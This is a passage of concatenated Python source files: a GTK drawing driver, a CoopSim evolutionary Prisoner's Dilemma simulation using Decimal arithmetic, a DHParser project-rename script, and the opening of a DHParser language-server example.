"\xcc\x66\x33\x99\xcc\x66\x33\x99", 8, 8)
stipple_PatternC = gdk.bitmap_create_from_data(None,
"\xc3\x66\x3c\x99\xc3\x66\x3c\x99", 8, 8)
white = gdk.color_parse("white")
black = gdk.color_parse("black")
class PangoContextWrapper(pango.Context):
def __init__(self):
pass
class Driver(Gfx.Driver):
"""A simple graphics layer on top of gdk.
See Gfx.py
"""
def __init__(self, gtk_widget, pango_layout):
"""Initialize canvas on a gdk drawable."""
Gfx.Driver.__init__(self)
self.pango_layout = pango_layout
self.pango_context = self.pango_layout.get_context()
self.pango_font = self.pango_context.get_font_description()
self.gtk_widget = gtk_widget
self.changeDrawable(gtk_widget.window)
def changeDrawable(self, drawable, pango_layout=None):
"""Change the drawable"""
## self.pango_font_desc = pango.FontDescription()
## self.pango_context = PangoContextWrapper()
## self.pango_context_set_font_description(self.pango_font_desc)
        if pango_layout is not None: self.pango_layout = pango_layout
self.drawable = drawable
if self.drawable:
self.gc = gdk.GC(self.drawable)
self.resizedGfx()
else: self.gc = None
self.gc_thickness = 1
self.gc_line_style = gdk.LINE_SOLID
self.gc_cap_style = gdk.CAP_ROUND
self.gc_join_style = gdk.JOIN_MITER
if self.gc:
self.w, self.h = self.drawable.get_size()
self.reset()
else: self.w, self.h = 0, 0
def resizedGfx(self):
self.w, self.h = self.drawable.get_size()
def getSize(self):
return self.w, self.h
def getResolution(self):
return 100
def __gdkColor(self, rgbTuple):
return gdk.Color(int(round(rgbTuple[0]*65535)),
int(round(rgbTuple[1]*65535)),
int(round(rgbTuple[2]*65535)))
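    # e.g. __gdkColor((1.0, 0.5, 0.0)) -> gdk.Color(65535, 32768, 0)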
def setColor(self, rgbTuple):
self.gc.set_rgb_fg_color(self.__gdkColor(rgbTuple))
# self.gc.set_rgb_bg_color(self.__gdkColor(rgbTuple))
self.color = rgbTuple
def setLineWidth(self, width):
self.lineWidth = width
if width == Gfx.THIN: self.gc_thickness = 1
elif width == Gfx.MEDIUM: self.gc_thickness = 2
elif width == Gfx.THICK: self.gc_thickness = 3
else: raise ValueError("'thickness' must be 'thin', 'medium' or 'thick' !")
self.gc.set_line_attributes(self.gc_thickness,
self.gc_line_style,
self.gc_cap_style,
self.gc_join_style)
def setLinePattern(self, pattern):
self.linePattern = pattern
if pattern == Gfx.CONTINUOUS:
self.gc_line_style = gdk.LINE_SOLID
elif pattern == Gfx.DASHED:
self.gc_line_style = gdk.LINE_ON_OFF_DASH
self.gc.set_dashes(0, (5, 5))
elif pattern == Gfx.DOTTED:
self.gc_line_style = gdk.LINE_ON_OFF_DASH
self.gc.set_dashes(0, (1, 4))
else: raise ValueError("'pattern' must be 'continuous', " + \
"'dashed' or 'dotted' !")
self.gc.set_line_attributes(self.gc_thickness,
self.gc_line_style,
self.gc_cap_style,
self.gc_join_style)
def setFillPattern(self, pattern):
self.fillPattern = pattern
if pattern == Gfx.SOLID:
fp = gdk.SOLID
pat = stipple_Solid
elif pattern == Gfx.PATTERN_A:
fp = gdk.STIPPLED
pat = stipple_PatternA
elif pattern == Gfx.PATTERN_B:
fp = gdk.STIPPLED
pat = stipple_PatternB
elif pattern == Gfx.PATTERN_C:
fp = gdk.STIPPLED
pat = stipple_PatternC
else: raise ValueError("'pattern' must be 'solid' or 'patternA', " + \
"'patternB', 'patternC' !")
self.gc.set_fill(fp)
self.gc.set_stipple(pat)
def setFont(self, ftype, size, weight):
self.fontType = ftype
self.fontSize = size
self.fontWeight = weight
if ftype == Gfx.SANS: ff = "sans"
elif ftype == Gfx.SERIF: ff = "serif"
elif ftype == Gfx.FIXED: ff = "monospace"
else: raise ValueError("'type' must be 'sans', 'serif' or 'fixed' !")
if size == Gfx.SMALL: fs = 5
elif size == Gfx.NORMAL: fs = 10
elif size == Gfx.LARGE: fs = 20
else: raise ValueError("'size' must be 'small', 'normal' or 'large' !")
fst = pango.STYLE_NORMAL
fw = pango.WEIGHT_NORMAL
if "i" in weight: fst = pango.STYLE_ITALIC
elif "b" in weight: fw = pango.WEIGHT_BOLD
self.pango_font.set_family(ff)
self.pango_font.set_size(fs*pango.SCALE)
self.pango_font.set_style(fst)
self.pango_font.set_weight(fw)
self.pango_layout.set_font_description(self.pango_font)
def getTextSize(self, text):
self.pango_layout.set_text(text)
return self.pango_layout.get_pixel_size()
## def selectFontSize(self, text, w,h):
## for fs in range(3,0,-1):
## self.setFont(self, self.fontType, fs, self.fontWeight)
## sw,sh = self.getTextSize(text)
## if sw <= w and sh <= h: break
## else:
## return 0
## return 1
def drawPoint(self, x, y):
self.drawable.draw_point(self.gc, x, self.h-y-1)
def __checkInLine(self):
if self.linePattern != Gfx.CONTINUOUS and \
self.fillPattern != Gfx.SOLID:
self.gc.set_fill(gdk.SOLID)
def __checkOutLine(self):
if self.linePattern != Gfx.CONTINUOUS and \
self.fillPattern != Gfx.SOLID:
self.gc.set_fill(gdk.STIPPLED)
def drawLine(self, x1, y1, x2, y2):
self.__checkInLine()
self.drawable.draw_line(self.gc, x1, self.h-y1-1, x2, self.h-y2-1)
self.__checkOutLine()
def drawRect(self, x, y, w, h):
self.__checkInLine()
self.drawable.draw_rectangle(self.gc,False,x,self.h-y-h,w-1,h-1)
self.__checkOutLine()
def drawPoly(self, array):
if array:
transformed = [(x, self.h-y-1) for x,y in array]
self.__checkInLine()
self.drawable.draw_lines(self.gc, transformed)
self.__checkOutLine()
def fillRect(self, x, y, w, h):
self.drawable.draw_rectangle(self.gc,True,x,self.h-y-h,w,h)
def fillPoly(self, array):
transformed = [(x, self.h-y-1) for x,y in array]
self.drawable.draw_polygon(self.gc, True, transformed)
def writeStr(self, x, y, str, rotationAngle=0.0):
self.pango_layout.set_text(str)
w, h = self.pango_layout.get_pixel_size()
if rotationAngle == 0.0:
self.drawable.draw_layout(self.gc, x, self.h-y-h,
self.pango_layout)
else:
a = rotationAngle / 180.0 * math.pi
da = math.atan2(h,0)-a
dw = int(h*math.cos(da)+0.5)
dh = int(h*math.sin(da)+0.5)-h
pixmap = gdk.Pixmap(self.drawable, w, h)
gc = gdk.GC(pixmap)
gc.set_rgb_fg_color(black)
gc.set_fill(gdk.SOLID)
pixmap.draw_rectangle(gc, True, 0, 0, w, h)
gc.set_rgb_fg_color(white)
pixmap.draw_layout(gc, 0, 0, self.pango_layout)
image = pixmap.get_image(0, 0, w, h)
for dy in range(h):
for dx in range(w):
if (image.get_pixel(dx, dy) & 0x808080)!= 0:
r = math.sqrt(dx**2+dy**2)
da = math.atan2(dy,dx) - a
xx = int(r * math.cos(da)+0.5)
yy = int(r * math.sin(da)+0.5)
self.drawable.draw_point(self.gc, x+xx-dw,
self.h-y-h+yy-dh)
########################################################################
#
# class Window
#
########################################################################
class Window(Driver, Gfx.Window):
def __init__(self, size=(640,480), title="gtkGraph"):
self.win = gtk.Window()
self.win.set_default_size(*size)
self.win.set_size_request(*size)
self.win.set_resizable(False)
self.win.set_title(title)
self.canvas = gtk.DrawingArea()
Driver.__init__(self, self.canvas,
self.canvas.create_pango_layout(""))
self.win.add(self.canvas)
self.canvas.connect("configure-event", self.onConfigure)
self.canvas.connect("expose-event", self.onExpose)
self.win.show_all()
self.win.connect("destroy", lambda w: gtk.main_quit())
self.clear()
def refresh(self):
"""Refresh the display."""
gc = self.canvas.get_style().fg_gc[gtk.STATE_NORMAL]
w, h = self.pixmap.get_size()
self.canvas.window.draw_drawable(gc, self.pixmap, 0,0,0,0,w,h)
def quit(self):
self.win.destroy()
gtk.main_quit()
def waitUntilClosed(self):
gtk.main()
def onConfigure(self, widget, event):
w, h = widget.window.get_size()
self.pixmap = gdk.Pixmap(widget.window, w, h)
self.changeDrawable(self.pixmap)
self.clear()
self.setColor((0.8,0.8,0.8))
self.fillRect(10, 10, 620, 380)
return True
def onExpose(self, widget, event):
x, y, w, h = event.area
gc = widget.get_style().fg_gc[gtk.STATE_NORMAL]
widget.window.draw_drawable(gc, self.pixmap, x, y, x, y, w, h)
return False
########################################################################
#
# Test
#
########################################################################
if __name__ == "__main__":
import systemTest
systemTest.Test_gtkGfx()
```
#### File: jecki/CoopSim/Simulation_decimal_patch.py
```python
from __future__ import generators # retain python 2.2 compatibility
from decimal import *
import copy, re
from PyPlotter import Gfx, Colors
from PopulationDynamics import Dynamics
import PrisonersDilemma as PD
from PopulationDynamics.Compatibility import *
from Logging import H1,H2,H3, H1X,H2X,H3X, LogNotificationInterface, HTMLLog
NUM_GENERATIONS = 50 # number of generations to start with in the
# population dynamical simulation
NUM_SAMPLES = PD.NUM_SAMPLES # Samples to take of a match if randomizing
# strategies or in game noise is involved
NO_GRAPH_OPTIMIZATION = False # graph drawing will be slowed down but
# accuracy is increased to printing and saving
###############################################################################
#
# classes for the description of simulation setups
#
###############################################################################
class Mutator(object):
"""Describes the mutation of a strategy in the simulation.
original = int: the ordinal number of the strategy that is going
to mutate
    mutated = int: the ordinal number of the strategy that 'original' is
going to mutate into
rate = float [0.0 - 1.0]: mutation rate
"""
def __eq__(self, other):
if not isinstance(other, Mutator): return False
if self.original != other.original: return False
if self.mutated != other.mutated: return False
if self.rate != other.rate: return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __init__(self, original, mutated, rate=0.01):
self.original = original
self.mutated = mutated
self.rate = rate
class SimSetup(object):
"""Contains all data defining a simulation.
name = string: name of the model
strategyList = list of Strategy objects: the list of the strategies
population = tuple: population share for each strategy
correlation = float [0.0-1.0]: correlation factor
gameNoise = float [0.0-1.0]: in game noise
noise = float [0.0-1.0]: evolutionary background noise
iterations = int: number of iterations for one match
samples = int: number of sample matches to take (only useful for
randomizing strategies)
payoff = tuple of floats: payoff tuple (T, R, P, S)
mutators = list of Mutator objects: description of possible
mutation of strategies during the course of the
evolutionary development.
cachedPM = cached payoff matrix
cachedLog = cached tournament log object
"""
def __eq__(self, other):
if not isinstance(other, SimSetup): return False
# names make no difference! if self.name != other.name: return False
if len(self.strategyList) != len(other.strategyList):
return False
for i in xrange(len(self.strategyList)):
if self.strategyList[i] != other.strategyList[i]: return False
if self.population != other.population: return False
if self.correlation != other.correlation: return False
if self.gameNoise != other.gameNoise: return False
if self.noise != other.noise: return False
if self.iterations != other.iterations: return False
if self.samples != other.samples: return False
if self.payoff != other.payoff: return False
if len(self.mutators) != len(other.mutators):
return False
for i in xrange(len(self.mutators)):
if self.mutators[i] != other.mutators[i]: return False
return True
def __ne__(self, other):
return not self.__eq__(other)
## def __setattr__(self, name, value):
## object.__setattr__(self, name, value)
## if name == "population":
## assert len(value) == len(self.strategyList),
## "population vector does not match length of strategy list!"
## elif name == "strategyList":
## if len(value) != len(self.population):
##                 object.__setattr__(self, "population",
## Dynamics.UniformDistribution(len(value)))
def __init__(self, name, strategyList = [], population = None,
correlation = 0.0, gameNoise = 0.0, noise = 0.0,
iterations = 200, samples = NUM_SAMPLES, payoff = (5.,3.,1.,0.),
mutators = [], PM = None, log = None):
self.name = name
self.strategyList = strategyList
        if population is None:
self.population = Dynamics.UniformDistribution(len(self.strategyList))
else: self.population = population
self.correlation = correlation
self.gameNoise = gameNoise
self.noise = noise
self.iterations = iterations
self.samples = samples
self.payoff = payoff
self.mutators = mutators
self.cachedPM = PM
self.cachedLog = log
self._userDefined = True # SimApp marks its own setups as False
def fname(self):
"""Returns the name of the setup as a proper file name."""
return self.name.replace("*","x").replace("?","x").replace("/","x")\
.replace("\\","x").replace(" ","_")
def htmlRepresentation(self):
"""Returns extensive information about this setup in HTML format."""
def rr(s):
"replace trailing zeros with blanks"
l = len(s); s2 = s.rstrip("0")
return (s2 + " "*(l - len(s2)))
html = ["<p>" + H2 + '<a name="setup"></a>Simulation setup of ' + \
self.name + H2X + "<br />\n\n"]
## t = "<b>Strategies:</b> "
## for s in self.strategyList:
## t += str(s)
## if len(t) >= 70:
## t += "<br />\n"; html.append(t); t = ""
## else: t += ", "
## if t != "": html.append(t[:-2]+"<br />\n")
html.append("<b>Strategies:</b> ")
snames = [str(s) for s in self.strategyList]
html.append(", ".join(snames))
html.append("<br /><br />\n\n<tt>")
p0 = self.population[0]; scale = 1.0/(1000*len(self.population))
for p in self.population:
if abs(p - p0) > scale:
pop = [rr("%1.5f"%s) for s in self.population]
lines = [", ".join(pop[i:i+5]) for i in xrange(0,len(pop),5)]
html.append("<b>population shares:</b><br />\n")
html.append("<br />\n".join(lines))
html.append("<br /><br />\n\n")
break
else:
html.append("uniform population distribution<br /><br />\n\n")
if self.mutators != []:
html.append("<b>mutations:</b><br />\n")
for d in self.mutators:
s1 = str(self.strategyList[d.original])
s2 = str(self.strategyList[d.mutated])
s1 += " " * max(20-len(s1), 1)
s2 += " " * max(20-len(s2), 1)
html.append(s1 + "=> " + s2 + " " + \
("%1.5f" % d.rate).rstrip("0") + "<br />\n")
html.append("<br />\n")
if self.correlation != 0.0:
html.append("correlation:"+" "*8+"%f<br />\n"%self.correlation)
if self.gameNoise != 0.0:
html.append("game Noise:"+" "*9+"%f<br />\n"%self.gameNoise)
if self.noise != 0.0:
html.append("evolutionary Noise: %f<br />\n"%self.noise)
html.append("payoff parameters: " + \
str(self.payoff) + "<br />\n")
html.append("iterations:"+" "*9+"%i<br />\n"%self.iterations)
if self.gameNoise > 0.0 or \
            reduce(lambda a, b: a or b.randomizing, self.strategyList, False):
html.append("match samples:"+" "*6+"%i<br />\n"%self.samples)
html.append("</tt></p>\n")
return "".join(html)
###############################################################################
#
# Simulation class
#
###############################################################################
# generator functions to optimize graph drawing
class xaxisIter(object):
"""-> iterate over virtual x-coordinates with one point for
each screen pixel.
"""
def __init__(self, graph, x1, x2):
self.graph = graph
a = self.graph._scaleX(x1); b = self.graph._scaleX(x2)
self.rngIter = xrange(a, b+2).__iter__()
self.pos = self.graph._invX(self.rngIter.next())
def check(self, x):
if x >= self.pos:
try:
self.pos = self.graph._invX(self.rngIter.next())
except StopIteration:
pass # actually this should never happen, catching it anyway!
return True
else: return NO_GRAPH_OPTIMIZATION
def mutation(population, degenList):
"""Apply mutation to a population"""
p = list(population)
for d in degenList:
x = population[d.original] * d.rate
p[d.original] -= x
p[d.mutated] += x
return tuple(p)
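# Example with illustrative numbers: a 1% mutation from strategy 0 to
# strategy 1 shifts one percent of strategy 0's population share per call:
#
#   pop = mutation((0.5, 0.5), [Mutator(0, 1, rate=0.01)])
#   # -> (0.495, 0.505)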
NORMAL_CAPTION_PEN = Gfx.BLACK_PEN
SMALL_CAPTION_PEN = Gfx.Pen(color = Gfx.BLACK, fsize = Gfx.SMALL)
class Simulation(object):
"""The simulation class is responsible for running a simulation
    and producing an output of the results in graphical form as well
    as an HTML log.
Attributes:
graph : A Graph.Cartesian object for the graphical representation
of the population dynamics
        simplex : A Simplex.Diagram object for producing a simplex
diagram of the population dynamics (only if exactly
three strategies are present in the simulation!)
notifier : A Logging.LogNotificationInterface for communicating
the progress of the simulation to the GUI
log : A Logging.HTMLLog for logging the simulation results
setup : A copy (!) of the simulation setup. (The progress of
the population dynamical simulation is written into
the 'population' field of this copy)
payoffMatrix: The payoff matrix of the tournament part of the
simulation
dynamicsFunction: The dynamics function for the population dynamical
development
rangeStack : Sequence of the respective range parameters of the
simulation graph (x1,y1,x2,y2), one for each call
of the method 'continueSim'
imgDirName : Name of the directory to write the images of the html
log to (only if the log is actually saved to disk!)
simplexName : file name of the simplex graph, if the html log is saved
firstGeneration: the first generation to start the next population
dynamical cycle with (when calling continueSim)
lastGeneration: the last generation of the next cycle
"""
def __init__(self, graph, simplex, log, notifier):
self.graph = graph
self.simplex = simplex
self.notifier = notifier
self.log = log
self.setup = None
self.payoffMatrix = None
self.dynamicsFunction = None
self.rangeStack = []
self.imgdirName = ""
self.simplexName = ""
self.firstGeneration = 1
self.lastGeneration = NUM_GENERATIONS
self._dontLogTwiceFlag = False
def _prepareEvLog(self):
if not self._alreadyLogged:
self._alreadyLogged = True
self.imgdirName = self.setup.fname() + "_images"
self.log.appendAt("toc",
'<a href="#evranking">4. Evolutionary Simulation</a><br />\n')
self.log.append(H2 + \
'<a name="evranking"></a>Evolutionary Simulation:' + \
H2X + "<br />\n\n")
if len(self.setup.strategyList) == 3:
self.simplexName = self.setup.fname() + "_simplex"
path = self.imgdirName + "/" + self.simplexName
self.log.append('<div align="center">' + \
'<a href="'+path+'.png">' + \
'<img src="'+path+'_web.png" alt="Image: '+\
self.simplexName + '.png not found!" />' + \
'</a></div><br /><br />\n')
self.log.entryPoint("evranking")
def newSetup(self, setup, progressCallback = lambda f:1):
self._alreadyLogged = False
self.setup = copy.copy(setup)
for s in self.setup.strategyList: s.register(self.setup)
self.firstGeneration = 1;
self.lastGeneration = NUM_GENERATIONS
        if self.setup.cachedPM is None:
self.log.clear()
self.log.pageTitle(self.setup.name)
self.log.append(H1+'<a name="top"></a>CoopSim - Simulation: '+\
self.setup.name + H1X + "\n\n")
self.log.append(H2+'<a name="toc"></a>Table of Contents'+ \
H2X + "\n\n<p>")
self.log.append('<a href="#setup">0. Simulation Setup</a><br />\n')
self.log.entryPoint("toc")
self.log.append("</p><br />\n")
self.log.append(setup.htmlRepresentation())
self.log.append('<div align="right"><a href="#top">[top]' + \
'</a></div><br />\n')
p = self.setup.payoff
a = array([[[p[2],p[2]],[p[0],p[3]]],[[p[3],p[0]],[p[1],p[1]]]])
self.payoffMatrix = PD.GenPayoffMatrix(self.setup.strategyList,
a, self.setup.iterations, self.setup.samples,
self.setup.gameNoise,self.log,progressCallback)
setup.cachedPM = self.payoffMatrix
self.setup.cachedPM = setup.cachedPM
setup.cachedLog = self.log.backup()
self.setup.cachedLog = setup.cachedLog
else:
self.payoffMatrix = self.setup.cachedPM
self.log.replay(self.setup.cachedLog)
self.notifier.updateLog(self.log.getHTMLPage())
## want decimals ?
setcontext(Context(prec=500))
for x in xrange(len(self.setup.population)):
for y in xrange(len(self.setup.population)):
self.payoffMatrix[x, y] = Decimal(repr(self.payoffMatrix[x,y]))
self.setup.correlation = Decimal(repr(self.setup.correlation))
self.setup.noise = Decimal(repr(self.setup.noise))
p = [Decimal(repr(x)) for x in self.setup.population]
self.setup.population = tuple(p)
## end decimals
df = Dynamics.GenDynamicsFunction(self.payoffMatrix,
self.setup.correlation,
self.setup.noise, 2)
if self.setup.mutators == []:
self.dynamicsFunction = df
else:
self.dynamicsFunction = lambda p: mutation(df(p), \
self.setup.mutators)
ysize = 1.0 / max(1.0, len(self.setup.strategyList)-1)
self.graph.reset(0, 0.0, self.lastGeneration, ysize)
self.rangeStack = []
i = 0
for s in self.setup.strategyList:
if Colors.colors[i] == (1.0, 1.0, 0.0): i += 1
self.graph.addPen(str(s), Gfx.Pen(Colors.colors[i], Gfx.MEDIUM),
False)
i += 1
            if i >= len(Colors.colors): i = 0
self.graph.setTitle('Population dynamics of "'+self.setup.name+'"')
if len(self.setup.strategyList) > 10:
self.graph.setStyle(captionPen = SMALL_CAPTION_PEN, redraw = False)
else:
self.graph.setStyle(captionPen = NORMAL_CAPTION_PEN, redraw = False)
self.graph.redrawCaption()
if len(self.setup.strategyList) == 3:
self.simplex.setFunction(self.dynamicsFunction)
self.simplex.setTitle('Simplex diagram of "'+self.setup.name+'"')
self.simplex.setLabels(str(self.setup.strategyList[0]),
str(self.setup.strategyList[1]),
str(self.setup.strategyList[2]))
else:
self.simplex.setFunction(lambda p:p)
if len(self.setup.strategyList) > 3:
self.simplex.setTitle("Too many strategies for " + \
"a simplex diagram!")
else:
self.simplex.setTitle("Too few strategies for "\
"a simplex diagram!")
self.simplex.setLabels("","","")
self._prepareEvLog()
def continueSim(self, record = None):
        if self.setup is None: return
self.notifier.statusBarHint("Running...")
if self.firstGeneration > 1:
self.graph.adjustRange(0, 0.0, self.lastGeneration, self.graph.y2)
else:
k = 0
for s in self.setup.strategyList:
self.graph.addValue(str(s), 0, float(self.setup.population[k]))
k += 1
#self.simplex.show()
p = self.setup.population
pixelSteps = xaxisIter(self.graph, self.firstGeneration,
self.lastGeneration)
for i in xrange(self.firstGeneration, self.lastGeneration+1):
p = self.dynamicsFunction(p)
if pixelSteps.check(i):
k = 0
for s in self.setup.strategyList:
self.graph.addValue(str(s), i, float(p[k]))
k += 1
            if record is not None: record.append(p)
self.setup.population = p
self._prepareEvLog()
anchor = "generation%i" % self.lastGeneration
linkstr = ' <a href="#'+anchor+'">'+ \
'Ranking after %i generations</a>' % \
self.lastGeneration + "<br />\n"
self.log.appendAt("toc", linkstr)
self.log.appendAt("evranking", re.sub(" ","",linkstr))
self.log.append("\n"+H3+'<a name="'+anchor+'"></a>' +\
"Ranking after %i generations:" % \
self.lastGeneration + H3X + "<br />\n\n<p><pre>")
ranking = zip(self.setup.population,
#Dynamics._QuickFitness2(self.setup.population, self.payoffMatrix),
[str(s) for s in self.setup.strategyList])
ranking.sort(); ranking.reverse()
k = 1
for r, name in ranking:
s = "%3i." % k + name + " "*max(40-len(name),1) + \
"%1.4f " % r + "\n"
self.log.append(s)
k += 1
self.log.append("</pre><br />\n")
imgName = self.setup.fname() + "_gn%i" % self.lastGeneration
path = self.imgdirName + "/" + imgName
self.log.append('<div align="center">'+\
'<a href="' + path + '.png">' + \
'<img src="'+path+'_web.png"'+'" alt="Image: ' + \
imgName + '.png not found!" /></a></div><br />\n')
self.log.append("</p>\n")
self.log.append('<div align="right"><a href="#top">[top]' + \
'</a></div><br />\n')
self.rangeStack.append((imgName, self.graph.x1, self.graph.y1,
self.graph.x2, min(self.graph.y2, 1.0)))
self.notifier.updateLog(self.log.getHTMLPage())
if self.firstGeneration <= 1: self.notifier.logToStart()
self.firstGeneration = self.lastGeneration + 1
self.lastGeneration = self.lastGeneration * 2
self.notifier.statusBarHint("Ready.")
```
|
{
"source": "jecki/DHParser",
"score": 3
}
|
#### File: DHParser/scripts/dhparser_rename.py
```python
import os
import re
import shutil
import sys
def save_project(path: str) -> bool:
"""Copies the old project to another directory."""
if os.path.exists(path + '_save'):
return False
shutil.copytree(path, path + '_save')
return True
def check_projectdir(path: str) -> bool:
"""Verifies that `path` if a valid DHParser project directory."""
name = os.path.basename(path)
def check(*args):
for filename in args:
filepath = os.path.join(path, filename)
if not (os.path.exists(filepath) and os.path.isfile(filepath)):
print('Could not find ' + filepath)
return False
return True
return check(name + '.ebnf', name + 'Parser.py', "tst_%s_grammar.py" % name)
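# For a project directory named "foo", check_projectdir thus expects the
# files foo.ebnf, fooParser.py and tst_foo_grammar.py to be present.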
def rename_projectdir(path: str, new: str) -> None:
"""
Renames the dhparser project in `path`. This implies renaming
the directory itself, the test and compile script and the data types
and variables that contain the project's name as part of their name.
"""
name = os.path.basename(path)
save = os.getcwd()
os.chdir(path)
os.rename(name + '.ebnf', new + '.ebnf')
os.rename(name + 'Parser.py', new + 'Parser.py')
os.rename('tst_%s_grammar.py' % name, 'tst_%s_grammar.py' % new)
for fname in (new + 'Parser.py', 'tst_%s_grammar.py' % new):
with open(fname, 'r', encoding='utf-8') as f:
content = f.read()
with open(fname, 'w', encoding='utf-8') as f:
f.write(content.replace(name, new))
os.chdir('..')
os.rename(name, new)
os.chdir(save)
def rename_project(projectdir: str, new_name: str) -> str:
"""Renames a project. Returns an error string in case of failure
or the empty string if successful."""
if not os.path.isdir(projectdir):
return projectdir + " is not a directory!"
elif check_projectdir(projectdir):
        m = re.match(r'\w+', new_name)
if m and len(m.group(0)) == len(new_name):
if save_project(projectdir):
rename_projectdir(projectdir, new_name)
else:
return 'Could not save old project to ' + os.path.basename(projectdir) + '_saved!'
else:
return new_name + " is not a valid project name!"
else:
return projectdir + " does not seem to be a DHParser-project directory!"
return ''
if __name__ == "__main__":
if len(sys.argv) == 3:
projectdir = sys.argv[1]
new_name = sys.argv[2]
error = rename_project(projectdir, new_name)
if error:
print(error)
sys.exit(1)
else:
print('Usage: python dhparser_rename.py PROJECT_DIRECTORY NEW_PROJECT_NAME')
```
#### File: examples/readme_example/readme_exampleServer.py
```python
import asyncio
import os
import sys
DEBUG = False
assert sys.version_info >= (3, 5, 7), "DHParser.server requires at least Python-Version 3.5.7"
scriptpath = os.path.dirname(__file__)
servername = os.path.splitext(os.path.basename(__file__))[0]
STOP_SERVER_REQUEST_BYTES = b"__STOP_SERVER__" # hardcoded in order to avoid import from DHParser.server
IDENTIFY_REQUEST = "identify()"
LOGGING_REQUEST = 'logging("")'
LOG_PATH = 'LOGS/'
DEFAULT_HOST = '127.0.0.1'
DEFAULT_PORT = 8888
ALTERNATIVE_PORTS = [8888, 8889, 8898, 8980, 8988, 8989]
DATA_RECEIVE_LIMIT = 262144
SERVER_REPLY_TIMEOUT = 3
KNOWN_HOST = '' # if host and port are retrieved from a config file, their
KNOWN_PORT = -2 # values are stored to these global variables
config_filename_cache = ''
CONNECTION_TYPE = 'tcp' # valid values: 'tcp', 'streams'
echo_file = None
def echo(msg: str):
"""Writes the message to stdout, or redirects it to a text file, in
case the server is connected via IO-streams instead of tcp."""
global CONNECTION_TYPE, echo_file
if CONNECTION_TYPE == 'tcp':
print(msg)
elif CONNECTION_TYPE == 'streams':
if echo_file is None or echo_file.closed:
new_file_flag = echo_file is None
echo_file = open('print.txt', 'a')
if new_file_flag:
import atexit
atexit.register(echo_file.close)
import time
t = time.localtime()
echo_file.write("\n\nDate and Time: %i-%i-%i %i:%i\n\n" % t[:5])
echo_file.write(msg)
echo_file.write('\n')
echo_file.flush()
else:
        print('Unknown connection type: %s. Must be either streams or tcp.' % CONNECTION_TYPE)
def debug(msg: str):
"""Prints a debugging message if DEBUG-flag is set"""
global DEBUG
if DEBUG:
echo(msg)
def get_config_filename() -> str:
"""
Returns the file name of a temporary config file that stores
the host and port of the currently running server.
"""
global config_filename_cache
if config_filename_cache:
return config_filename_cache
def probe(dir_list) -> str:
for tmpdir in dir_list:
if os.path.exists(tmpdir) and os.path.isdir(tmpdir):
return tmpdir
return ''
if sys.platform.find('win') >= 0:
tmpdir = probe([r'C:\TEMP', r'C:\TMP', r'\TEMP', r'\TMP'])
else:
        tmpdir = probe(['~/tmp', '/tmp', '/var/tmp', '/usr/tmp'])
config_filename_cache = os.path.join(tmpdir, os.path.basename(__file__)) + '.cfg'
return config_filename_cache
def retrieve_host_and_port():
"""
Retrieve host and port from temporary config file or return default values
for host and port, in case the temporary config file does not exist.
"""
global DEFAULT_HOST, DEFAULT_PORT, KNOWN_HOST, KNOWN_PORT
host = DEFAULT_HOST
port = DEFAULT_PORT
cfg_filename = get_config_filename()
try:
with open(cfg_filename) as f:
host, ports = f.read().strip(' \n').split(' ')
port = int(ports)
if (host, port) != (KNOWN_HOST, KNOWN_PORT):
debug('Retrieved host and port value %s:%i from config file "%s".'
% (host, port, cfg_filename))
KNOWN_HOST, KNOWN_PORT = host, port
except FileNotFoundError:
debug('File "%s" does not exist. Using default values %s:%i for host and port.'
% (cfg_filename, host, port))
except ValueError:
debug('removing invalid config file: ' + cfg_filename)
os.remove(cfg_filename)
return host, port
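# The config file written by run_server() holds a single line of the form
# "<host> <port>", e.g. "127.0.0.1 8888"; an unparsable file is treated as
# invalid and removed.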
def asyncio_run(coroutine):
"""Backward compatible version of Pyhon3.7's `asyncio.run()`"""
if sys.version_info >= (3, 7):
return asyncio.run(coroutine)
else:
try:
loop = asyncio.get_event_loop()
except RuntimeError:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
return loop.run_until_complete(coroutine)
finally:
try:
loop.run_until_complete(loop.shutdown_asyncgens())
finally:
asyncio.set_event_loop(None)
loop.close()
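# Usage is identical to asyncio.run(), e.g.:
#   result = asyncio_run(single_request(IDENTIFY_REQUEST, host, port))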
def json_rpc(func_name, params={}, ID=None) -> dict:
"""Generates a JSON-RPC-call for `func` with parameters `params`"""
return {"jsonrpc": "2.0", "method": func_name, "params": params, "id": ID}
class readme_exampleCPUBoundTasks:
def __init__(self, lsp_data: dict):
from DHParser.lsp import gen_lsp_table
self.lsp_data = lsp_data
self.lsp_table = gen_lsp_table(self, prefix='lsp_')
class readme_exampleBlockingTasks:
def __init__(self, lsp_data: dict):
from DHParser.lsp import gen_lsp_table
self.lsp_data = lsp_data
self.lsp_table = gen_lsp_table(self, prefix='lsp_')
class readme_exampleLanguageServerProtocol:
"""
For the specification and implementation of the language server protocol, see:
https://code.visualstudio.com/api/language-extensions/language-server-extension-guide
https://microsoft.github.io/language-server-protocol/
https://langserver.org/
"""
def __init__(self):
from DHParser.lsp import gen_lsp_table
self.lsp_data = {
'processId': 0,
'rootUri': '',
'clientCapabilities': {},
'serverInfo': { "name": "readme_example-Server", "version": "0.1" },
'serverCapabilities': {}
}
self.connection = None
self.cpu_bound = readme_exampleCPUBoundTasks(self.lsp_data)
self.blocking = readme_exampleBlockingTasks(self.lsp_data)
self.lsp_table = gen_lsp_table(self, prefix='lsp_')
self.lsp_fulltable = self.lsp_table.copy()
assert self.lsp_fulltable.keys().isdisjoint(self.cpu_bound.lsp_table.keys())
self.lsp_fulltable.update(self.cpu_bound.lsp_table)
assert self.lsp_fulltable.keys().isdisjoint(self.blocking.lsp_table.keys())
self.lsp_fulltable.update(self.blocking.lsp_table)
def connect(self, connection):
self.connection = connection
def lsp_initialize(self, **kwargs):
# # This has been taken care of by DHParser.server.Server.lsp_verify_initialization()
# if self.shared.initialized or self.shared.processId != 0:
# return {"code": -32002, "message": "Server has already been initialized."}
# self.shared.shutdown = False
self.lsp_data['processId'] = kwargs['processId']
self.lsp_data['rootUri'] = kwargs['rootUri']
self.lsp_data['clientCapabilities'] = kwargs['capabilities']
return {'capabilities': self.lsp_data['serverCapabilities'],
'serverInfo': self.lsp_data['serverInfo']}
def lsp_custom(self, **kwargs):
return kwargs
def lsp_shutdown(self):
self.lsp_data['processId'] = 0
self.lsp_data['rootUri'] = ''
self.lsp_data['clientCapabilities'] = {}
return {}
def run_server(host, port, log_path=None):
"""
Starts a new readme_exampleServer. If `port` is already occupied, different
ports will be tried.
"""
